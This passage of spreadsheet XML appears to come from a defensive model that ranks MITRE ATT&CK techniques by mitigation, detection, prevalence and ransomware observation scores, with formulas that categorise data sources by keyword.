        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS116" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT116" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU11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52.044221080876788</v>
      </c>
    </row>
    <row r="117" spans="1:47" ht="51">
      <c r="A117" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.56666666666666665</v>
      </c>
      <c r="B117" s="37">
        <f t="shared" si="1"/>
        <v>429.27145014285719</v>
      </c>
      <c r="C117" s="37" t="s">
        <v>433</v>
      </c>
      <c r="D117" s="50" t="s">
        <v>429</v>
      </c>
      <c r="E117" s="37" t="s">
        <v>434</v>
      </c>
      <c r="F117" s="37">
        <v>1</v>
      </c>
      <c r="G117" s="37">
        <v>1</v>
      </c>
      <c r="H117" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I117" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J117" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K117" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L117" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M117" s="37">
        <v>0</v>
      </c>
      <c r="N117" s="56">
        <v>3</v>
      </c>
      <c r="O117" s="56">
        <v>181</v>
      </c>
      <c r="P117" s="56">
        <v>7</v>
      </c>
      <c r="Q117" s="56">
        <v>32</v>
      </c>
      <c r="R117" s="57" t="s">
        <v>435</v>
      </c>
      <c r="S117" s="57">
        <v>20</v>
      </c>
      <c r="T117" s="57" t="s">
        <v>436</v>
      </c>
      <c r="U117" s="57">
        <v>19</v>
      </c>
      <c r="V117" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.84761909523809531</v>
      </c>
      <c r="W117" s="37">
        <v>39</v>
      </c>
      <c r="X117" s="37">
        <v>0.70909100000000003</v>
      </c>
      <c r="Y117" s="37">
        <v>0.70909100000000003</v>
      </c>
      <c r="Z117" s="37">
        <v>223</v>
      </c>
      <c r="AA117" s="37">
        <v>2.23</v>
      </c>
      <c r="AB117" s="37">
        <v>1</v>
      </c>
      <c r="AC117" s="37"/>
      <c r="AD117" s="50" t="s">
        <v>432</v>
      </c>
      <c r="AE117" s="37" t="str" cm="1">
        <f t="array" ref="AE117">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD117)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF117" s="37">
        <v>113</v>
      </c>
      <c r="AG117" s="37" t="str" cm="1">
        <f t="array" ref="AG117">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD117)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH117" s="37">
        <v>113</v>
      </c>
      <c r="AI117" s="37" t="str" cm="1">
        <f t="array" ref="AI117">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD117)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ117" s="37">
        <v>113</v>
      </c>
      <c r="AK117" s="37" t="str" cm="1">
        <f t="array" ref="AK117">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD117)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL117" s="37">
        <v>113</v>
      </c>
      <c r="AM117" s="37" t="str" cm="1">
        <f t="array" ref="AM117">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD117)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN117" s="37">
        <v>0</v>
      </c>
      <c r="AO117" s="37">
        <v>8</v>
      </c>
      <c r="AP117" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.56666666666666665</v>
      </c>
      <c r="AQ117" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>143.09048338095241</v>
      </c>
      <c r="AR117" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS117" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AT117" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AU11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27.445806358276645</v>
      </c>
    </row>
    <row r="118" spans="1:47" ht="34">
      <c r="A118" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B118" s="37">
        <f t="shared" si="1"/>
        <v>137.10010880952382</v>
      </c>
      <c r="C118" s="37" t="s">
        <v>437</v>
      </c>
      <c r="D118" s="50" t="s">
        <v>429</v>
      </c>
      <c r="E118" s="37" t="s">
        <v>438</v>
      </c>
      <c r="F118" s="37">
        <v>1</v>
      </c>
      <c r="G118" s="37">
        <v>1</v>
      </c>
      <c r="H118" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I118" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J118" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K118" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L118" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M118" s="37">
        <v>0</v>
      </c>
      <c r="N118" s="56">
        <v>0</v>
      </c>
      <c r="O118" s="56">
        <v>2</v>
      </c>
      <c r="P118" s="56">
        <v>2</v>
      </c>
      <c r="Q118" s="56">
        <v>0</v>
      </c>
      <c r="R118" s="57" t="s">
        <v>439</v>
      </c>
      <c r="S118" s="57">
        <v>3</v>
      </c>
      <c r="T118" s="57" t="s">
        <v>440</v>
      </c>
      <c r="U118" s="57">
        <v>16</v>
      </c>
      <c r="V118" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.20000023809523809</v>
      </c>
      <c r="W118" s="37">
        <v>19</v>
      </c>
      <c r="X118" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y118" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z118" s="37">
        <v>4</v>
      </c>
      <c r="AA118" s="37">
        <v>0.04</v>
      </c>
      <c r="AB118" s="37">
        <v>0.04</v>
      </c>
      <c r="AC118" s="37"/>
      <c r="AD118" s="50" t="s">
        <v>131</v>
      </c>
      <c r="AE118" s="37" t="str" cm="1">
        <f t="array" ref="AE118">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD118)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF118" s="37">
        <v>114</v>
      </c>
      <c r="AG118" s="37" t="str" cm="1">
        <f t="array" ref="AG118">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD118)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH118" s="37">
        <v>114</v>
      </c>
      <c r="AI118" s="37" t="str" cm="1">
        <f t="array" ref="AI118">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD118)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ118" s="37">
        <v>114</v>
      </c>
      <c r="AK118" s="37" t="str" cm="1">
        <f t="array" ref="AK118">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD118)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL118" s="37">
        <v>114</v>
      </c>
      <c r="AM118" s="37" t="str" cm="1">
        <f t="array" ref="AM118">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD118)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN118" s="37">
        <v>0</v>
      </c>
      <c r="AO118" s="37">
        <v>0</v>
      </c>
      <c r="AP118" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ118" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>45.70003626984127</v>
      </c>
      <c r="AR118" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS118" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT118" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU11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19" spans="1:47" ht="34">
      <c r="A119" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.53333333333333333</v>
      </c>
      <c r="B119" s="37">
        <f t="shared" si="1"/>
        <v>173.42389733333334</v>
      </c>
      <c r="C119" s="37" t="s">
        <v>441</v>
      </c>
      <c r="D119" s="50" t="s">
        <v>429</v>
      </c>
      <c r="E119" s="37" t="s">
        <v>442</v>
      </c>
      <c r="F119" s="37">
        <v>1</v>
      </c>
      <c r="G119" s="37">
        <v>1</v>
      </c>
      <c r="H119" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I119" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J119" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K119" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L119" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M119" s="37">
        <v>0</v>
      </c>
      <c r="N119" s="56">
        <v>2</v>
      </c>
      <c r="O119" s="56">
        <v>21</v>
      </c>
      <c r="P119" s="56">
        <v>0</v>
      </c>
      <c r="Q119" s="56">
        <v>9</v>
      </c>
      <c r="R119" s="57" t="s">
        <v>443</v>
      </c>
      <c r="S119" s="57">
        <v>2</v>
      </c>
      <c r="T119" s="57" t="s">
        <v>444</v>
      </c>
      <c r="U119" s="57">
        <v>11</v>
      </c>
      <c r="V119" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.27619066666666664</v>
      </c>
      <c r="W119" s="37">
        <v>13</v>
      </c>
      <c r="X119" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y119" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z119" s="37">
        <v>32</v>
      </c>
      <c r="AA119" s="37">
        <v>0.32</v>
      </c>
      <c r="AB119" s="37">
        <v>0.32</v>
      </c>
      <c r="AC119" s="37"/>
      <c r="AD119" s="50" t="s">
        <v>159</v>
      </c>
      <c r="AE119" s="37" t="str" cm="1">
        <f t="array" ref="AE119">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD119)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF119" s="37">
        <v>115</v>
      </c>
      <c r="AG119" s="37" t="str" cm="1">
        <f t="array" ref="AG119">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD119)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH119" s="37">
        <v>115</v>
      </c>
      <c r="AI119" s="37" t="str" cm="1">
        <f t="array" ref="AI119">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD119)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ119" s="37">
        <v>115</v>
      </c>
      <c r="AK119" s="37" t="str" cm="1">
        <f t="array" ref="AK119">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD119)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL119" s="37">
        <v>115</v>
      </c>
      <c r="AM119" s="37" t="str" cm="1">
        <f t="array" ref="AM119">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD119)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN119" s="37">
        <v>0</v>
      </c>
      <c r="AO119" s="37">
        <v>7</v>
      </c>
      <c r="AP119" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.53333333333333333</v>
      </c>
      <c r="AQ119" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>57.807965777777781</v>
      </c>
      <c r="AR119" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS119" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AT119" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AU11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9.801327629629629</v>
      </c>
    </row>
    <row r="120" spans="1:47" ht="34">
      <c r="A120" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B120" s="37">
        <f t="shared" si="1"/>
        <v>168.28580285714284</v>
      </c>
      <c r="C120" s="37" t="s">
        <v>445</v>
      </c>
      <c r="D120" s="50" t="s">
        <v>429</v>
      </c>
      <c r="E120" s="37" t="s">
        <v>446</v>
      </c>
      <c r="F120" s="37">
        <v>1</v>
      </c>
      <c r="G120" s="37">
        <v>1</v>
      </c>
      <c r="H120" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I120" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J120" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K120" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L120" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M120" s="37">
        <v>0</v>
      </c>
      <c r="N120" s="56">
        <v>0</v>
      </c>
      <c r="O120" s="56">
        <v>8</v>
      </c>
      <c r="P120" s="56">
        <v>18</v>
      </c>
      <c r="Q120" s="56">
        <v>3</v>
      </c>
      <c r="R120" s="57" t="s">
        <v>443</v>
      </c>
      <c r="S120" s="57">
        <v>2</v>
      </c>
      <c r="T120" s="57" t="s">
        <v>444</v>
      </c>
      <c r="U120" s="57">
        <v>11</v>
      </c>
      <c r="V120" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.26190495238095235</v>
      </c>
      <c r="W120" s="37">
        <v>13</v>
      </c>
      <c r="X120" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y120" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z120" s="37">
        <v>29</v>
      </c>
      <c r="AA120" s="37">
        <v>0.28999999999999998</v>
      </c>
      <c r="AB120" s="37">
        <v>0.28999999999999998</v>
      </c>
      <c r="AC120" s="37"/>
      <c r="AD120" s="50" t="s">
        <v>159</v>
      </c>
      <c r="AE120" s="37" t="str" cm="1">
        <f t="array" ref="AE120">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD120)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF120" s="37">
        <v>116</v>
      </c>
      <c r="AG120" s="37" t="str" cm="1">
        <f t="array" ref="AG120">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD120)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH120" s="37">
        <v>116</v>
      </c>
      <c r="AI120" s="37" t="str" cm="1">
        <f t="array" ref="AI120">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD120)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ120" s="37">
        <v>116</v>
      </c>
      <c r="AK120" s="37" t="str" cm="1">
        <f t="array" ref="AK120">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD120)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL120" s="37">
        <v>116</v>
      </c>
      <c r="AM120" s="37" t="str" cm="1">
        <f t="array" ref="AM120">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD120)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN120" s="37">
        <v>0</v>
      </c>
      <c r="AO120" s="37">
        <v>1</v>
      </c>
      <c r="AP120" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ120" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>56.095267619047611</v>
      </c>
      <c r="AR120" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS120" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT120" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU12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1.3594111337868477</v>
      </c>
    </row>
    <row r="121" spans="1:47" ht="51">
      <c r="A121" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B121" s="37">
        <f t="shared" si="1"/>
        <v>245.66666666666669</v>
      </c>
      <c r="C121" s="37" t="s">
        <v>447</v>
      </c>
      <c r="D121" s="50" t="s">
        <v>429</v>
      </c>
      <c r="E121" s="37" t="s">
        <v>448</v>
      </c>
      <c r="F121" s="37">
        <v>1</v>
      </c>
      <c r="G121" s="37">
        <v>1</v>
      </c>
      <c r="H121" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I121" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J121" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K121" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L121" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M121" s="37">
        <v>0</v>
      </c>
      <c r="N121" s="56">
        <v>1</v>
      </c>
      <c r="O121" s="56">
        <v>18</v>
      </c>
      <c r="P121" s="56">
        <v>0</v>
      </c>
      <c r="Q121" s="56">
        <v>4</v>
      </c>
      <c r="R121" s="57" t="s">
        <v>449</v>
      </c>
      <c r="S121" s="57">
        <v>16</v>
      </c>
      <c r="T121" s="57" t="s">
        <v>450</v>
      </c>
      <c r="U121" s="57">
        <v>17</v>
      </c>
      <c r="V121" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.4238095238095238</v>
      </c>
      <c r="W121" s="37">
        <v>33</v>
      </c>
      <c r="X121" s="37">
        <v>0.6</v>
      </c>
      <c r="Y121" s="37">
        <v>0.6</v>
      </c>
      <c r="Z121" s="37">
        <v>23</v>
      </c>
      <c r="AA121" s="37">
        <v>0.23</v>
      </c>
      <c r="AB121" s="37">
        <v>0.23</v>
      </c>
      <c r="AC121" s="37"/>
      <c r="AD121" s="50" t="s">
        <v>451</v>
      </c>
      <c r="AE121" s="37" t="str" cm="1">
        <f t="array" ref="AE121">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD121)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF121" s="37">
        <v>117</v>
      </c>
      <c r="AG121" s="37" t="str" cm="1">
        <f t="array" ref="AG121">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD121)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH121" s="37">
        <v>117</v>
      </c>
      <c r="AI121" s="37" t="str" cm="1">
        <f t="array" ref="AI121">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD121)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ121" s="37">
        <v>117</v>
      </c>
      <c r="AK121" s="37" t="str" cm="1">
        <f t="array" ref="AK121">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD121)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL121" s="37">
        <v>117</v>
      </c>
      <c r="AM121" s="37" t="str" cm="1">
        <f t="array" ref="AM121">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD121)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN121" s="37">
        <v>0</v>
      </c>
      <c r="AO121" s="37">
        <v>2</v>
      </c>
      <c r="AP121" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ121" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>81.8888888888889</v>
      </c>
      <c r="AR121" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS121" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT121" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU12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3.9470899470899474</v>
      </c>
    </row>
    <row r="122" spans="1:47" ht="34">
      <c r="A122" s="37">
